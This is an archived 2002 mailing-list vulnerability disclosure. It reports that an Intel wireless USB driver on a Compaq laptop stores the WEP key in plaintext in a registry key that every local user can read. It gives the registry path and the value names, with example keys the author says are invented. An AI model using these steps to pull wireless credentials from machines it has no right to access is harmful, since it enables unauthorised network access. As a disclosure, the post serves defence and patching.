('binary' encoding is not supported, stored as-is) Intro: while doing some troubleshoting i found a bug on a compaq evo n600c, with an integrated 802.11b card connected via usb (on the back of the display) running as Intel(R) PRO/Wireless 2011B LAN USB Device. Description: the WEP-Key ist stored plain to the registry. the permission the the specific key is weak enough that every local user has read access and can extract it via regedit.exe or an equivalent tool. a driver from other vendors (as example: Actiontec PrismII) stores the 128bit key in a encrypted form to the same place in the registry. Howto: Easy way: if you open up the properties dialog of your WLAN-Card and click to the "Advanced" tab, you can find an entry dislaying the WEP-Key plaintext (only as administrator). a normal user don't have access to this "Advanced" tab. this happened with the latest driver version from Compaq Support Page (version 1.5.16.0). I tried to get the latest driver from intel which is Version 1.5.18.0 (downloaded on 24th January 2002). The newer release fixed one part by not showing the entry in the "Advanced" tab. Everytime working way: lets look @ the registry General: the security policies on [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008] Owner: local Administrator Owner Group: local Administrators Permissions Name: Permisssion: Apply to: local Administrator: Full Control This Key and Subkeys local Power Users: Read This Key and Subkeys local Users: Read This Key and Subkeys Owner: Full Control Subkeys only System: Full Control This Key and Subkeys but if you look @ registry under [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\ Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0008] ^^ look for your correct device section ^^ (no matter which of the 2 noted driver versions used) you find the string entry "DefaultKeys"="364e01815b300d8038abc5ff00000000000000" where the first 12 Hex-values show the WEP key in plaintext. "364e01815b300d8038abc5ff" on another system with the new driver (1.15.18.0) added additional key's under the same context noted above: "Profiles\Default\WepKey" "Key128"="2544801583660d7009abcdef00000000000000" "DefKeyId128"="1 if this wep-key belongs to anyone, i apologize. this key is free invented from my fingers on the keyboard!
This archive was generated by hypermail 2b30 : Mon Jan 28 2002 - 08:37:24 PST